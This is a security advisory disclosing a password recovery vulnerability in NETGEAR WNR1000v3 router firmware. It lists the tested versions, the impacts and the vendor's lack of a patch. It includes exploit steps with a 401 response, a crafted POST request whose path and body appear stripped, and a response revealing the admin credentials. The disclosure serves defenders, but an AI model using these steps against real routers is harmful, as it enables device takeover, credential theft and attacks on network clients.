NETGEAR WNR1000v3 Password Recovery Vulnerability


Description: Newer firmware versions of the NETGEAR N150 WNR1000v3 wireless router are affected by a password recovery vulnerability. Exploiting this vulnerability allows an attacker to recover the router's (plaintext) Administrator credentials and subsequently gain full access to the device. This vulnerabilty can be exploited remotely if the remote administration access feature is enabled (as well as locally via wired or wireless access). Tested Device Model: Netgear N150 WNR1000v3 Tested Device Firmware Versions: V1.0.2.60_60.0.86, V1.0.2.54_60.0.82NA, and V1.0.2.62_60.0.87 Potential Impacts: Gaining full control over a wireless router exposes multiple attack vectors including: DoS, DNS control (many ways this can be leveraged to exploit clients), access to PPPoE credentials, cleartext WPA/WPA2 PSK (for guest and private network) firewall rule and port forwarding manipulation, etc. Vulnerabilty Status: Vulnerability was privately disclosed to the vendor in June of 2013, however they have not yet issued a patch. Other Notes: This vulnerability remains exploitable when the password recovery feature of the router is disabled. Overview: The password recovery mechanism appears to be designed to work as follows: 1.) After failing to login the user will be redirected to a password recovery page that requests the router serial number 2.) If the user enters the serial number correctly, another page will appear that requires the user to correctly answer 2 secret questions 3.) If the user answers the secret questions correctly, the router username and password is displayed The problem: The implementation of this password recovery method has issues...lots of issues Vulnerability and Exploit Details: 1.) Access the router login through a web browser: 2.) Select "Cancel" on the HTTP basic login box (or enter arbitrary credentials), the router responds with the following (Note the "unauth.cgi?id" parameter): -------------------------------------------------- HTTP/1.0 401 Unauthorized WWW-Authenticate: Basic realm="NETGEAR WNR1000v3" Content-type: text/html <html> <head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>401 Unauthorized</title></head> <body onload="document.aForm.submit()"><h1>401 Unauthorized</h1> <p>Access to this resource is denied, your client has not supplied the correct authentication.</p><form method="post" action="unauth.cgi?id=78185530" name="aForm"></form></body> </html> -------------------------------------------------- 3.) Use the unauth.cgi ID parameter to send the following (crafted) HTTP post request: ------------------------------------------------------------------------------------------------- POST HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: Content-Length: 35 Connection: Keep-Alive Pragma: no-cache -------------------------------------------------- The username and (plaintext) password are returned in the response (truncated for brevity): -------------------------------------------------- .. <tr> <td class="MNUText" align="right">Router Admin Username</td> <td class="MNUText" align="left">admin</td> </tr> <tr> <td class="MNUText" align="right">Router Admin Password</td> <td class="MNUText" align="left">D0n'tGuessMe!</td> </tr> .. -------------------------------------------------- Additional details and proof-of-concept exploit can be found here: http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html